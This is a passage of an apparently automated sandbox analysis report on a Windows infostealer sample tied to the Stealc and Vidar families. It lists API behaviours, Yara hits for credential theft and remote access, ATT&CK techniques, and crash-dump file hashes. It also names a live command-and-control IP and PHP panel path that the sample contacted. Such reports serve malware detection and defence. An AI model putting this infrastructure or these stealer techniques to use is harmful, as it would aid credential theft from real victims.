                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00929867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00929867
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00927DF7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.3.gMkw55jZRs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.gMkw55jZRs.exe.2330000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.910e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.910e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1688352446.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gMkw55jZRs.exe PID: 6876, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.3.gMkw55jZRs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.gMkw55jZRs.exe.2330000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.910e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.910e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gMkw55jZRs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1688352446.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gMkw55jZRs.exe PID: 6876, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Virtualization/Sandbox Evasion
                      LSASS Memory41
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager11
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      gMkw55jZRs.exe41%VirustotalBrowse
                      gMkw55jZRs.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      http://62.122.184.144/12%VirustotalBrowse
                      http://62.122.184.14412%VirustotalBrowse
                      http://62.122.184.144/f88d87a7e087e100.php14%VirustotalBrowse
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://62.122.184.144/trueunknown
                      http://62.122.184.144/f88d87a7e087e100.phptrueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://62.122.184.144/f88d87a7e087e100.php9gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://62.122.184.144/SgMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://upx.sf.netAmcache.hve.3.drfalse
                          • URL Reputation: safe
                          unknown
                          http://62.122.184.144/f88d87a7e087e100.phpngMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.122.184.144/f88d87a7e087e100.phpbgMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.122.184.144/f88d87a7e087e100.php/gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.122.184.144/f88d87a7e087e100.phpFgMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.122.184.144FgMkw55jZRs.exe, 00000000.00000002.1904627382.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.122.184.144gMkw55jZRs.exe, 00000000.00000002.1904627382.000000000099E000.00000004.00000020.00020000.00000000.sdmp, gMkw55jZRs.exe, 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    62.122.184.144
                                    unknownunknown
                                    49120GORSET-ASRUtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528657
                                    Start date and time:2024-10-08 08:12:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 59s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:gMkw55jZRs.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:cde961132c60bec82f2fd8340bf376b3.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@8/29@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 23
                                    • Number of non-executed functions: 165
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    TimeTypeDescription
                                    02:13:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    62.122.184.144QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                    • 62.122.184.144/f88d87a7e087e100.php
                                    c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                    • 62.122.184.144/f88d87a7e087e100.php
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    GORSET-ASRUQmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                    • 62.122.184.144
                                    c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                    • 62.122.184.144
                                    1.exeGet hashmaliciousRedLineBrowse
                                    • 62.122.184.51
                                    zJO55iLN3G.elfGet hashmaliciousUnknownBrowse
                                    • 31.40.39.14
                                    4VOPmuZZVV.exeGet hashmaliciousGoBrutBrowse
                                    • 62.122.184.95
                                    0Rae7oghna.elfGet hashmaliciousMiraiBrowse
                                    • 46.173.48.47
                                    PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                    • 62.122.190.121
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9564402135201322
                                    Encrypted:false
                                    SSDEEP:192:w2K+1O0s00G4OIjuSZr+dQzuiFdZ24IO8P:E+1p0G4OIjOyzuiFdY4IO8P
                                    MD5:BD1647BC6F687CACC95FA00F0A1D33FB
                                    SHA1:A194BAA3E6B7A708546504E2F0DA6D9D65984316
                                    SHA-256:BD3C65AB7148E4F25376A97C15E9744C9306058BDC2711EE7D756DEA7E465CB8
                                    SHA-512:375916A32FA7F9E549CD7B9E0D441EDFF282C47D3B135C49A0CD968943066FFFEC9773DA71C68424CC41CD4B501BBEB056D4970B82D4F7B82150B1D4380852C9
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.6.0.3.8.7.4.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.6.3.6.6.8.7.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.3.4.2.1.f.d.-.c.0.1.2.-.4.4.a.a.-.a.b.3.d.-.d.3.e.1.d.f.c.f.1.a.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.b.a.d.b.e.e.-.0.6.9.6.-.4.3.f.3.-.9.3.e.9.-.f.8.a.4.5.7.e.2.3.a.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.933114577880543
                                    Encrypted:false
                                    SSDEEP:96:JxzO++Csah+SoA7JfPQXIDcQnc6rCcEhcw3rr+HbHg/8BRTf3Oy1F/cIP2FUtZrL:a++COd056rAjuSZr+d+zuiFMZ24IO8P
                                    MD5:4CB50749ED8CF59A1D6C068A67EE8D23
                                    SHA1:66D13D9D0FA46C36FB9374762ADC0EB2C03C282D
                                    SHA-256:4605BC7995257A9D9F6C490B76A8152B82C1CB164F11820EAB18616C156411A4
                                    SHA-512:5610B3B305F4829A6899E79A262A653EA050B0991DA0B6D0F4780FE9079821D9337518346DD60757860E38995451D04474ED95AD5B047739B947360B107A475D
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.2.9.4.1.0.0.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.6.b.5.c.6.0.-.4.a.c.6.-.4.e.4.4.-.a.c.1.f.-.2.a.2.f.b.2.4.1.8.e.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.9.a.2.5.0.d.-.5.6.c.b.-.4.4.6.5.-.8.d.3.6.-.a.9.f.d.6.6.f.b.5.8.0.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8840277673881796
                                    Encrypted:false
                                    SSDEEP:96:nu7rU5iz+Ssah+SoA7JfPQXIDcQnc6rCcEhcw3rr+HbHg/8BRTf3Oy1F/cIP2FUo:D50+SOd056rAjuSZr+3zuiFMZ24IO8P
                                    MD5:A982BE79B0F749807F40A61CD0C1754C
                                    SHA1:0D6668235C3B571069A9384A1298B74A20415094
                                    SHA-256:788910C658FABF3AA4DE70BA419522E1E8FB7E9C31317BAF1CD32AA5AFCEF2DD
                                    SHA-512:D3ABDB2D60994CEF81ED067DD9A3270422D7EF7F939A88FE88B38C3921B5BB5B8EDD458E514343D5A44D7503BDCFC6CB7D32FB8B3DB97B472861867C4E4E1FF3
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.0.8.5.8.6.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.1.2.c.3.d.4.-.f.7.0.f.-.4.0.5.a.-.8.1.2.0.-.1.9.2.c.9.c.d.3.1.9.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.f.f.f.b.0.d.-.8.9.0.4.-.4.a.b.e.-.b.7.4.3.-.5.4.1.d.6.4.f.b.a.1.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9061709290112728
                                    Encrypted:false
                                    SSDEEP:192:sMMx+1Od056rAjuSZr+duzuiFMZ24IO8P:sR+1p56rAjO8zuiFMY4IO8P
                                    MD5:EB9D48B511BC14F783BEB094FDCC6CB6
                                    SHA1:7DA5132974D01A353EB23AA078DD3C550A2041E3
                                    SHA-256:B74FEAE85F993F5095AD6AF7262B05F49995B241B8E4512CD28768D5CB719EAD
                                    SHA-512:841D445F3370AD6C16464A5245A395D52B2BC4314995E67B8DB25B288134210182A2D44D432CEA0332E581F99819BE105797E454D0FA7E770495AFB4DF202B1F
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.1.9.6.9.3.6.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.2.4.9.3.6.8.-.e.d.e.8.-.4.f.e.d.-.b.3.f.8.-.0.3.3.e.7.6.5.7.1.3.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.a.b.2.c.f.b.-.6.e.3.e.-.4.f.0.2.-.b.2.7.a.-.1.3.3.f.f.5.5.8.f.0.5.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8840233591393258
                                    Encrypted:false
                                    SSDEEP:96:Y1+/sah+SoA7JfPQXIDcQnc6rCcEhcw3rr+HbHg/8BRTf3Oy1F/cIP2FUtZr1+8w:w+/Od056rAjuSZr+3zuiFMZ24IO8P
                                    MD5:222AC15805135F901A1A4DB218D856A4
                                    SHA1:FDDE313AE84F6C16136D0D9A8C9AA8FBB8F455EC
                                    SHA-256:349A1C9F536B8E317EC6FC64FF837371F6460D5D0C0A5585B8450FF858828BDB
                                    SHA-512:3209BB92707038DD1FCCFB3EF073B45F6773047004BF1FA7133CBF357FD356B4BD8336E1F21E9A560F6635B91867A7910662EE26D4963B50B95A2028001651E4
                                    Malicious:true
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.7.9.5.7.0.6.8.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.3.2.3.a.e.d.-.a.e.b.5.-.4.f.0.1.-.9.e.6.c.-.5.3.7.2.7.c.6.a.9.7.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.9.f.5.8.6.0.-.6.9.9.4.-.4.2.1.c.-.8.2.8.d.-.c.9.5.4.5.8.5.3.b.f.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8839493348133668
                                    Encrypted:false
                                    SSDEEP:96:1QT+Fsah+SoA7JfPQXIDcQnc6rCcEhcw3rr+HbHg/8BRTf3Oy1F/cIP2FUtZr1+f:WT+FOd056rAjuSZr+3zuiFMZ24IO8PT
                                    MD5:B91236098553ABBE189BC6C7D44F553B
                                    SHA1:6D3C74BDBB37C1C3E39AB6516234993D6F18A2D0
                                    SHA-256:76D5DA37146DCC2EC7ED5F35F4B4D0929C44D03FCBE112A16683B060A014BE8D
                                    SHA-512:98F49A0F8C8FEB9D189F9BAE741E526077A1F908A09488044B0057B852F957663A39F17B35DC39BEB8F66B5E2E50482CBE66308DF36E99C3A93B277193EC4F84
                                    Malicious:true
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.7.8.8.6.1.0.7.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.3.b.9.c.5.e.-.e.0.4.5.-.4.a.0.5.-.b.9.8.9.-.9.3.8.c.2.a.9.e.4.c.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.f.4.5.9.0.9.-.9.f.c.7.-.4.d.8.e.-.a.1.7.3.-.9.2.a.2.0.4.9.b.e.d.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
